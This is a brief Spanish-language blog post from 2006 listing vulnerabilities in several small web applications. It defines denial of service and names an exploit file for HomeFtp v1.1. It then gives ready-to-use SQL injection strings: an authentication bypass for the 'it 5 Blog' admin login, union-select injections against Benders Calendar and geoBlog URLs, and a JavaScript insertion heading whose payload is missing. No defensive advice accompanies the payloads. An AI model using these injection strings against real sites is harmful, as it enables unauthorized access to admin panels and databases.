ecoestadistica.com

sábado, enero 14, 2006

Vulnerabilidades....

HomeFtp v1.1 Denegacion de Servicio

Negación del servicio:
Un ataque del negacion de servicio (también, DOS) es un ataque contra un sistema informático o una red que causen una pérdida de servicio a los usuarios, típicamente la pérdida de conectividad y de servicios de la red consumiendo la anchura de banda de la red de la víctima o sobrecargando los recursos de cómputo del sistema de la víctima.

Exploit para esta Vulnerabilidad:

homeftp_v1.1_xpl.c

-----------------------------------------------------------

it 5 Blog SQL Injection & Authentication Bypass

Authentication bypass ejemplo (SQL Injection):

http://host/admin/index.php

User Name: a' or 1/*
Password: a' or 1/*

-----------------------------------------------------------

Benders Calendar SQL Injection

Year" "Month" or "Day" value:

999' union select 1,2,3,4,5,6/*

-----------------------------------------------------------

geoBlog SQL Injection

SQL Injection Ejemplo:

http://host/geoblog/viewcat.php? cat=I'% 20union%20select% 201,2,3,4,5, 6,7/*

-----------------------------------------------------------

Bit 5 Blog JavaScript Insertion

Ejemplo:




clickme

salu2

ecoestadistica.com